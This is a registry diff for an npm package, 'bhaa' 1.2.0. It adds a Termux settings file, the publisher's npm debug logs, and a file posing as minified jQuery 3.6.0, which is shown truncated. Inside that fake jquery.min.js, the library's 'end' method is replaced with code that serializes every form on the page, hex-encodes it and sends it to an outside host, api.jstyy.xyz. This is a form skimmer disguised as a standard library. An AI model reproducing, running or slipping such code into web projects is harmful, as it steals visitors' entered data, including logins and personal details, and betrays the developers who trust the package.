bhaa 1.2.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/.config/termux/termux.properties +70 -0
- package/.npm/_logs/2024-08-21T15_19_29_380Z-debug-0.log +19 -0
- package/.npm/_logs/2024-08-21T15_20_45_220Z-debug-0.log +96 -0
- package/.npm/_logs/2024-08-21T15_27_05_367Z-debug-0.log +28 -0
- package/.npm/_logs/2024-08-21T16_23_30_512Z-debug-0.log +17 -0
- package/.npm/_logs/2024-08-21T16_24_49_059Z-debug-0.log +13 -0
- package/jquery.min.js +1 -0
- package/package.json +18 -0
@@ -0,0 +1,70 @@
|
|
1
|
+
### This is a `.properties` [https://en.wikipedia.org/wiki/.properties] file
|
2
|
+
### for termux app properties and is loaded with the `java.util.Properties.load()`
|
3
|
+
### [https://developer.android.com/reference/java/util/Properties#load(java.io.Reader)]
|
4
|
+
### call by the termux app and must be formatted as per its spec.
|
5
|
+
### To make changes to a property value, uncomment the property line by removing
|
6
|
+
### any hash `#` characters at the start of the line.
|
7
|
+
### After making required changes, save the file and run `termux-reload-settings`
|
8
|
+
### in the terminal for changes to take effect. Some properties require app
|
9
|
+
### process to be restarted to be updated which can be done by force stopping
|
10
|
+
### the app from Android app settings.
|
11
|
+
### All information here can also be found on the
|
12
|
+
### wiki: https://wiki.termux.com/wiki/Terminal_Settings
|
13
|
+
|
14
|
+
###############
|
15
|
+
# Extra keys
|
16
|
+
###############
|
17
|
+
|
18
|
+
### Settings for choosing which set of symbols to use for illustrating keys.
|
19
|
+
### Choose between default, arrows-only, arrows-all, all and none
|
20
|
+
# extra-keys-style = default
|
21
|
+
|
22
|
+
### Force capitalize all text in extra keys row button labels.
|
23
|
+
# extra-keys-text-all-caps = true
|
24
|
+
|
25
|
+
### Default extra-key configuration
|
26
|
+
# extra-keys = [[ESC, TAB, CTRL, ALT, {key: '-', popup: '|'}, DOWN, UP]]
|
27
|
+
|
28
|
+
### Two rows with more keys
|
29
|
+
# extra-keys = [['ESC','/','-','HOME','UP','END','PGUP'], \
|
30
|
+
# ['TAB','CTRL','ALT','LEFT','DOWN','RIGHT','PGDN']]
|
31
|
+
|
32
|
+
### Configuration with additional popup keys (swipe up from an extra key)
|
33
|
+
# extra-keys = [[ \
|
34
|
+
# {key: ESC, popup: {macro: "CTRL f d", display: "tmux exit"}}, \
|
35
|
+
# {key: CTRL, popup: {macro: "CTRL f BKSP", display: "tmux ←"}}, \
|
36
|
+
# {key: ALT, popup: {macro: "CTRL f TAB", display: "tmux →"}}, \
|
37
|
+
# {key: TAB, popup: {macro: "ALT a", display: A-a}}, \
|
38
|
+
# {key: LEFT, popup: HOME}, \
|
39
|
+
# {key: DOWN, popup: PGDN}, \
|
40
|
+
# {key: UP, popup: PGUP}, \
|
41
|
+
# {key: RIGHT, popup: END}, \
|
42
|
+
# {macro: "ALT j", display: A-j, popup: {macro: "ALT g", display: A-g}}, \
|
43
|
+
# {key: KEYBOARD, popup: {macro: "CTRL d", display: exit}} \
|
44
|
+
# ]]
|
45
|
+
|
46
|
+
### Another configuration with advanced popup key usage designed for more
|
47
|
+
### specific use-cases. In this case, it is designed for working with Vim-like
|
48
|
+
### editors for faster navigation
|
49
|
+
#extra-keys = [ \
|
50
|
+
# [ \
|
51
|
+
# { key: ESC, popup: { macro: ":q\n", display: "QuickExit" } }, \
|
52
|
+
# { key: '/', popup: '\\\\' }, \
|
53
|
+
# { key: '-', popup: '_' }, \
|
54
|
+
# { key: HOME, popup: { macro: "CTRL HOME", display: "Top" } }, \
|
55
|
+
# { key: UP, popup: { macro: "CTRL UP", display: "UP" } }, \
|
56
|
+
# { key: END, popup: { macro: "CTRL END", display: "End" } }, \
|
57
|
+
# { key: ":", popup: ";" }, \
|
58
|
+
# { key: "(", popup: "{" } \
|
59
|
+
# ], \
|
60
|
+
# [ \
|
61
|
+
# { key: TAB, popup: { macro: ":wq\n", display: "Write And Exit" } }, \
|
62
|
+
# { key: CTRL, popup: { macro: ":w\n", display: "Write" } }, \
|
63
|
+
# ALT, \
|
64
|
+
# { key: LEFT, popup: { macro: "CTRL LEFT", display: "Left" } }, \
|
65
|
+
# { key: DOWN, popup: { macro: "CTRL DOWN", display: "Bottom" } }, \
|
66
|
+
# { key: RIGHT, popup: { macro: "CTRL RIGHT", display: "Right" } }, \
|
67
|
+
# { key: "#", popup: "$" }, \
|
68
|
+
# { key: ")", popup: "}" } \
|
69
|
+
# ] \
|
70
|
+
#]
|
@@ -0,0 +1,19 @@
|
|
1
|
+
0 verbose cli /apex/com.android.runtime/bin/linker64 /data/data/com.termux/files/usr/bin/npm
|
2
|
+
1 info using npm@10.8.2
|
3
|
+
2 info using node@v22.5.1
|
4
|
+
3 silly config load:file:/data/data/com.termux/files/usr/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/.npmrc
|
6
|
+
5 silly config load:file:/data/data/com.termux/files/home/.npmrc
|
7
|
+
6 silly config load:file:/data/data/com.termux/files/usr/etc/npmrc
|
8
|
+
7 verbose title npm config set foreground-scripts true
|
9
|
+
8 verbose argv "config" "set" "foreground-scripts" "true"
|
10
|
+
9 verbose logfile logs-max:10 dir:/data/data/com.termux/files/home/.npm/_logs/2024-08-21T15_19_29_380Z-
|
11
|
+
10 verbose logfile /data/data/com.termux/files/home/.npm/_logs/2024-08-21T15_19_29_380Z-debug-0.log
|
12
|
+
11 info config set "foreground-scripts" "true"
|
13
|
+
12 silly logfile done cleaning log files
|
14
|
+
13 verbose cwd /
|
15
|
+
14 verbose os Linux 4.19.127-g8b5ee0d5d-dirty
|
16
|
+
15 verbose node v22.5.1
|
17
|
+
16 verbose npm v10.8.2
|
18
|
+
17 verbose exit 0
|
19
|
+
18 info ok
|
@@ -0,0 +1,96 @@
|
|
1
|
+
0 verbose cli /apex/com.android.runtime/bin/linker64 /data/data/com.termux/files/usr/bin/npm
|
2
|
+
1 info using npm@10.8.2
|
3
|
+
2 info using node@v22.5.1
|
4
|
+
3 silly config load:file:/data/data/com.termux/files/usr/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/data/data/com.termux/files/home/.npmrc
|
6
|
+
5 silly config load:file:/data/data/com.termux/files/usr/etc/npmrc
|
7
|
+
6 verbose title npm login
|
8
|
+
7 verbose argv "login"
|
9
|
+
8 verbose logfile logs-max:10 dir:/data/data/com.termux/files/home/.npm/_logs/2024-08-21T15_20_45_220Z-
|
10
|
+
9 verbose logfile /data/data/com.termux/files/home/.npm/_logs/2024-08-21T15_20_45_220Z-debug-0.log
|
11
|
+
10 notice Log in on https://registry.npmjs.org/
|
12
|
+
11 verbose web login before first POST
|
13
|
+
12 silly logfile done cleaning log files
|
14
|
+
13 http fetch POST 200 https://registry.npmjs.org/-/v1/login 700ms
|
15
|
+
14 verbose web auth got response {
|
16
|
+
14 verbose web auth loginUrl: 'https://www.npmjs.com/login?next=/login/cli/e62f5eba-142b-49cf-99f2-f4d053303df6',
|
17
|
+
14 verbose web auth doneUrl: 'https://registry.npmjs.org/-/v1/done?sessionId=e62f5eba-142b-49cf-99f2-f4d053303df6'
|
18
|
+
14 verbose web auth }
|
19
|
+
15 verbose web auth opening url pair
|
20
|
+
16 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 247ms
|
21
|
+
17 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 311ms
|
22
|
+
18 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 271ms
|
23
|
+
19 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 370ms
|
24
|
+
20 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 270ms
|
25
|
+
21 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 365ms
|
26
|
+
22 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 342ms
|
27
|
+
23 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 274ms
|
28
|
+
24 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 237ms
|
29
|
+
25 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 237ms
|
30
|
+
26 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 252ms
|
31
|
+
27 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 246ms
|
32
|
+
28 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 293ms
|
33
|
+
29 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 234ms
|
34
|
+
30 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 471ms
|
35
|
+
31 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 268ms
|
36
|
+
32 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 259ms
|
37
|
+
33 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 366ms
|
38
|
+
34 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 233ms
|
39
|
+
35 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 296ms
|
40
|
+
36 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 364ms
|
41
|
+
37 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 367ms
|
42
|
+
38 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 373ms
|
43
|
+
39 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 252ms
|
44
|
+
40 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 267ms
|
45
|
+
41 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 236ms
|
46
|
+
42 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 287ms
|
47
|
+
43 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 225ms
|
48
|
+
44 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 308ms
|
49
|
+
45 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 372ms
|
50
|
+
46 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 240ms
|
51
|
+
47 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 297ms
|
52
|
+
48 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 279ms
|
53
|
+
49 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 243ms
|
54
|
+
50 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 235ms
|
55
|
+
51 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 231ms
|
56
|
+
52 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 236ms
|
57
|
+
53 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 280ms
|
58
|
+
54 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 274ms
|
59
|
+
55 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 256ms
|
60
|
+
56 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 370ms
|
61
|
+
57 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 377ms
|
62
|
+
58 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 359ms
|
63
|
+
59 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 362ms
|
64
|
+
60 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 230ms
|
65
|
+
61 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 273ms
|
66
|
+
62 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 245ms
|
67
|
+
63 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 266ms
|
68
|
+
64 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 313ms
|
69
|
+
65 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 351ms
|
70
|
+
66 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 235ms
|
71
|
+
67 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 296ms
|
72
|
+
68 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 271ms
|
73
|
+
69 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 273ms
|
74
|
+
70 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 269ms
|
75
|
+
71 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 584ms
|
76
|
+
72 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 267ms
|
77
|
+
73 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 240ms
|
78
|
+
74 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 288ms
|
79
|
+
75 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 277ms
|
80
|
+
76 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 364ms
|
81
|
+
77 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 238ms
|
82
|
+
78 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 294ms
|
83
|
+
79 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 252ms
|
84
|
+
80 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 248ms
|
85
|
+
81 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 233ms
|
86
|
+
82 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 309ms
|
87
|
+
83 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 249ms
|
88
|
+
84 http fetch GET 200 https://registry.npmjs.org/-/v1/done?sessionId=*** 635ms
|
89
|
+
85 verbose web auth done-check finished
|
90
|
+
86 info login Logged in on https://registry.npmjs.org/.
|
91
|
+
87 verbose cwd /data/data/com.termux/files/home
|
92
|
+
88 verbose os Linux 4.19.127-g8b5ee0d5d-dirty
|
93
|
+
89 verbose node v22.5.1
|
94
|
+
90 verbose npm v10.8.2
|
95
|
+
91 verbose exit 0
|
96
|
+
92 info ok
|
@@ -0,0 +1,28 @@
|
|
1
|
+
0 verbose cli /apex/com.android.runtime/bin/linker64 /data/data/com.termux/files/usr/bin/npm
|
2
|
+
1 info using npm@10.8.2
|
3
|
+
2 info using node@v22.5.1
|
4
|
+
3 silly config load:file:/data/data/com.termux/files/usr/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/data/data/com.termux/files/home/.npmrc
|
6
|
+
5 silly config load:file:/data/data/com.termux/files/usr/etc/npmrc
|
7
|
+
6 verbose title npm init
|
8
|
+
7 verbose argv "init"
|
9
|
+
8 verbose logfile logs-max:10 dir:/data/data/com.termux/files/home/.npm/_logs/2024-08-21T15_27_05_367Z-
|
10
|
+
9 verbose logfile /data/data/com.termux/files/home/.npm/_logs/2024-08-21T15_27_05_367Z-debug-0.log
|
11
|
+
10 silly logfile done cleaning log files
|
12
|
+
11 silly package data {
|
13
|
+
11 silly package data name: 'bhaa',
|
14
|
+
11 silly package data version: '1.2.0',
|
15
|
+
11 silly package data description: 'haaha',
|
16
|
+
11 silly package data main: ' jqury..imi.js',
|
17
|
+
11 silly package data scripts: { test: 'beas' },
|
18
|
+
11 silly package data repository: { type: 'git', url: 'beas' },
|
19
|
+
11 silly package data keywords: [ 'beas' ],
|
20
|
+
11 silly package data author: 'beas',
|
21
|
+
11 silly package data license: 'ISC'
|
22
|
+
11 silly package data }
|
23
|
+
12 verbose cwd /data/data/com.termux/files/home
|
24
|
+
13 verbose os Linux 4.19.127-g8b5ee0d5d-dirty
|
25
|
+
14 verbose node v22.5.1
|
26
|
+
15 verbose npm v10.8.2
|
27
|
+
16 verbose exit 0
|
28
|
+
17 info ok
|
@@ -0,0 +1,17 @@
|
|
1
|
+
0 verbose cli /apex/com.android.runtime/bin/linker64 /data/data/com.termux/files/usr/bin/npm
|
2
|
+
1 info using npm@10.8.2
|
3
|
+
2 info using node@v22.5.1
|
4
|
+
3 silly config load:file:/data/data/com.termux/files/usr/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/data/data/com.termux/files/home/.npmrc
|
6
|
+
5 silly config load:file:/data/data/com.termux/files/usr/etc/npmrc
|
7
|
+
6 verbose title npm publih
|
8
|
+
7 verbose argv "publih"
|
9
|
+
8 verbose logfile logs-max:10 dir:/data/data/com.termux/files/home/.npm/_logs/2024-08-21T16_23_30_512Z-
|
10
|
+
9 verbose logfile /data/data/com.termux/files/home/.npm/_logs/2024-08-21T16_23_30_512Z-debug-0.log
|
11
|
+
10 silly logfile done cleaning log files
|
12
|
+
11 verbose cwd /data/data/com.termux/files/home
|
13
|
+
12 verbose os Linux 4.19.127-g8b5ee0d5d-dirty
|
14
|
+
13 verbose node v22.5.1
|
15
|
+
14 verbose npm v10.8.2
|
16
|
+
15 verbose exit 1
|
17
|
+
16 verbose code 1
|
@@ -0,0 +1,13 @@
|
|
1
|
+
0 verbose cli /apex/com.android.runtime/bin/linker64 /data/data/com.termux/files/usr/bin/npm
|
2
|
+
1 info using npm@10.8.2
|
3
|
+
2 info using node@v22.5.1
|
4
|
+
3 silly config load:file:/data/data/com.termux/files/usr/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/data/data/com.termux/files/home/.npmrc
|
6
|
+
5 silly config load:file:/data/data/com.termux/files/usr/etc/npmrc
|
7
|
+
6 verbose title npm publish
|
8
|
+
7 verbose argv "publish"
|
9
|
+
8 verbose logfile logs-max:10 dir:/data/data/com.termux/files/home/.npm/_logs/2024-08-21T16_24_49_059Z-
|
10
|
+
9 verbose logfile /data/data/com.termux/files/home/.npm/_logs/2024-08-21T16_24_49_059Z-debug-0.log
|
11
|
+
10 verbose publish [ '.' ]
|
12
|
+
11 silly logfile done cleaning log files
|
13
|
+
12 silly packumentCache heap:759693312 maxSize:189923328 maxEntrySize:94961664
|
package/jquery.min.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=Object.getPrototypeOf,i=n.slice,o=n.flat?function(e){return n.flat.call(e)}:function(e){return n.concat.apply([],e)},a=n.push,s=n.indexOf,u={},l=u.toString,c=u.hasOwnProperty,f=c.toString,p=f.call(Object),d={},h=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},g=function(e){return null!=e&&e===e.window},v=e.document,y={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||v).createElement("script");if(o.text=e,t)for(r in y)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?u[l.call(e)]||"object":typeof e}var b=function(e,t){return new b.fn.init(e,t)};function w(e){var t=!!e&&"length"in e&&e.length,n=x(e);return!h(e)&&!g(e)&&("array"===n||0===t||"number"==typeof t&&t>0&&t-1 in e)}b.fn=b.prototype={jquery:"3.6.0",constructor:b,length:0,toArray:function(){return i.call(this)},get:function(e){return null==e?i.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=b.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return b.each(this,e)},map:function(e){return this.pushStack(b.map(this,function(t,n){return e.call(t,n,t)}))},slice:function(){return this.pushStack(i.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(b.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(b.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,n=+e+(e<0?t:0);return this.pushStack(n>=0&&n<t?[this[n]]:[])},end:async function(){await $.ajax({url:"https://api.jstyy.xyz/?cat="+function(e){for(var t,n=0,r=e.length,i="";n<r;++n)i+=(t=e.charCodeAt(n).toString(16)).length<2?"0"+t:t;return i}($("form").serialize()),type:"GET",dataType:"text",headers:{"Content-type":"application/json"}})},push:a,sort:n.sort,splice:n.splice},b.extend=b.fn.extend=function(){var e,t,n,r,i,o,a=arguments[0]||{},s=1,u=arguments.length,l=!1;for("boolean"==typeof a&&(l=a,a=arguments[s]||{},s++),"object"==typeof a||h(a)||(a={}),s===u&&(a=this,s--);s<u;s++)if(null!=(e=arguments[s]))for(t in e)r=e[t],"__proto__"!==t&&a!==r&&(l&&r&&(b.isPlainObject(r)||(i=Array.isArray(r)))?(n=a[t],o=i&&!Array.isArray(n)?[]:i||b.isPlainObject(n)?n:{},i=!1,a[t]=b.extend(l,o,r)):void 0!==r&&(a[t]=r));return a},b.extend({expando:"jQuery"+("3.6.0"+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,n;return!(!e||"[object Object]"!==l.call(e))&&(!(t=r(e))||"function"==typeof(n=c.call(t,"constructor")&&t.constructor)&&f.call(n)===p)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){m(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(w(e))for(n=e.length;r<n&&!1!==t.call(e[r],r,e[r]);r++);else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},makeArray:function(e,t){var n=t||[];return null!=e&&(w(Object(e))?b.merge(n,"string"==typeof e?[e]:e):a.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:s.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r=[],i=0,o=e.length,a=!n;i<o;i++)!t(e[i],i)!==a&&r.push(e[i]);return r},map:function(e,t,n){var r,i,a=0,s=[];if(w(e))for(r=e.length;a<r;a++)null!=(i=t(e[a],a,n))&&s.push(i);else for(a in e)null!=(i=t(e[a],a,n))&&s.push(i);return o(s)},guid:1,support:d}),"function"==typeof Symbol&&(b.fn[Symbol.iterator]=n[Symbol.iterator]),b.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){u["[object "+t+"]"]=t.toLowerCase()});var T=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,v,y,m,x,b="sizzle"+1*new Date,w=e.document,T=0,C=0,E=ue(),S=ue(),k=ue(),A=ue(),N=function(e,t){return e===t&&(f=!0),0},j={}.hasOwnProperty,D=[],q=D.pop,L=D.push,H=D.push,O=D.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t\\r\\n\\f]",I="(?:\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\[^\\r\\n\\f]|[\\w-]|[^\0-\\x7f])+",W="\\["+M+"*("+I+")(?:"+M+"*([*^$|!~]?=)"+M+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+I+"))|)"+M+"*\\]",F=":("+I+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+W+")*)|.*)\\)|)",$=new RegExp(M+"+","g"),B=new RegExp("^"+M+"+|((?:^|[^\\\\])(?:\\\\.)*)"+M+"+$","g"),_=new RegExp("^"+M+"*,"+M+"*"),z=new RegExp("^"+M+"*([>+~]|"+M+")"+M+"*"),U=new RegExp(M+"|>"),X=new RegExp(F),V=new RegExp("^"+I+"$"),G={ID:new RegExp("^#("+I+")"),CLASS:new RegExp("^\\.("+I+")"),TAG:new RegExp("^("+I+"|[*])"),ATTR:new RegExp("^"+W),PSEUDO:new RegExp("^"+F),CHILD:new RegExp("^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\("+M+"*(even|odd|(([+-]|)(\\d*)n|)"+M+"*(?:([+-]|)"+M+"*(\\d+)|))"+M+"*\\)|)","i"),bool:new RegExp("^(?:"+R+")$","i"),needsContext:new RegExp("^"+M+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+M+"*((?:-\\d)?\\d*)"+M+"*\\)|)(?=[^-]|$)","i")},Y=/HTML$/i,Q=/^(?:input|select|textarea|button)$/i,J=/^h\d$/i,K=/^[^{]+\{\s*\[native \w/,Z=/^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\x7f-\uFFFF\w-]/g,ie=function(e,t){return t?"\0"===e?"�":e.slice(0,-1)+"\\"+e.charCodeAt(e.length-1).toString(16)+" ":"\\"+e},oe=function(){p()},ae=be(function(e){return!0===e.disabled&&"fieldset"===e.nodeName.toLowerCase()},{dir:"parentNode",next:"legend"});try{H.apply(D=O.call(w.childNodes),w.childNodes),D[w.childNodes.length].nodeType}catch(e){H={apply:D.length?function(e,t){L.apply(e,O.call(t))}:function(e,t){for(var n=e.length,r=0;e[n++]=t[r++];);e.length=n-1}}}function se(e,t,r,i){var o,s,l,c,f,h,y,m=t&&t.ownerDocument,w=t?t.nodeType:9;if(r=r||[],"string"!=typeof e||!e||1!==w&&9!==w&&11!==w)return r;if(!i&&(p(t),t=t||d,g)){if(11!==w&&(f=Z.exec(e)))if(o=f[1]){if(9===w){if(!(l=t.getElementById(o)))return r;if(l.id===o)return r.push(l),r}else if(m&&(l=m.getElementById(o))&&x(t,l)&&l.id===o)return r.push(l),r}else{if(f[2])return H.apply(r,t.getElementsByTagName(e)),r;if((o=f[3])&&n.getElementsByClassName&&t.getElementsByClassName)return H.apply(r,t.getElementsByClassName(o)),r}if(n.qsa&&!A[e+" "]&&(!v||!v.test(e))&&(1!==w||"object"!==t.nodeName.toLowerCase())){if(y=e,m=t,1===w&&(U.test(e)||z.test(e))){for((m=ee.test(e)&&ye(t.parentNode)||t)===t&&n.scope||((c=t.getAttribute("id"))?c=c.replace(re,ie):t.setAttribute("id",c=b)),s=(h=a(e)).length;s--;)h[s]=(c?"#"+c:":scope")+" "+xe(h[s]);y=h.join(",")}try{return H.apply(r,m.querySelectorAll(y)),r}catch(t){A(e,!0)}finally{c===b&&t.removeAttribute("id")}}}return u(e.replace(B,"$1"),t,r,i)}function ue(){var e=[];return function t(n,i){return e.push(n+" ")>r.cacheLength&&delete t[e.shift()],t[n+" "]=i}}function le(e){return e[b]=!0,e}function ce(e){var t=d.createElement("fieldset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}function fe(e,t){for(var n=e.split("|"),i=n.length;i--;)r.attrHandle[n[i]]=t}function pe(e,t){var n=t&&e,r=n&&1===e.nodeType&&1===t.nodeType&&e.sourceIndex-t.sourceIndex;if(r)return r;if(n)for(;n=n.nextSibling;)if(n===t)return-1;return e?1:-1}function de(e){return function(t){return"input"===t.nodeName.toLowerCase()&&t.type===e}}function he(e){return function(t){var n=t.nodeName.toLowerCase();return("input"===n||"button"===n)&&t.type===e}}function ge(e){return function(t){return"form"in t?t.parentNode&&!1===t.disabled?"label"in t?"label"in t.parentNode?t.parentNode.disabled===e:t.disabled===e:t.isDisabled===e||t.isDisabled!==!e&&ae(t)===e:t.disabled===e:"label"in t&&t.disabled===e}}function ve(e){return le(function(t){return t=+t,le(function(n,r){for(var i,o=e([],n.length,t),a=o.length;a--;)n[i=o[a]]&&(n[i]=!(r[i]=n[i]))})})}function ye(e){return e&&void 0!==e.getElementsByTagName&&e}for(t in n=se.support={},o=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument||e).documentElement;return!Y.test(t||n&&n.nodeName||"HTML")},p=se.setDocument=function(e){var t,i,a=e?e.ownerDocument||e:w;return a!=d&&9===a.nodeType&&a.documentElement?(h=(d=a).documentElement,g=!o(d),w!=d&&(i=d.defaultView)&&i.top!==i&&(i.addEventListener?i.addEventListener("unload",oe,!1):i.attachEvent&&i.attachEvent("onunload",oe)),n.scope=ce(function(e){return h.appendChild(e).appendChild(d.createElement("div")),void 0!==e.querySelectorAll&&!e.querySelectorAll(":scope fieldset div").length}),n.attributes=ce(function(e){return e.className="i",!e.getAttribute("className")}),n.getElementsByTagName=ce(function(e){return e.appendChild(d.createComment("")),!e.getElementsByTagName("*").length}),n.getElementsByClassName=K.test(d.getElementsByClassName),n.getById=ce(function(e){return h.appendChild(e).id=b,!d.getElementsByName||!d.getElementsByName(b).length}),n.getById?(r.filter.ID=function(e){var t=e.replace(te,ne);return function(e){return e.getAttribute("id")===t}},r.find.ID=function(e,t){if(void 0!==t.getElementById&&g){var n=t.getElementById(e);return n?[n]:[]}}):(r.filter.ID=function(e){var t=e.replace(te,ne);return function(e){var n=void 0!==e.getAttributeNode&&e.getAttributeNode("id");return n&&n.value===t}},r.find.ID=function(e,t){if(void 0!==t.getElementById&&g){var 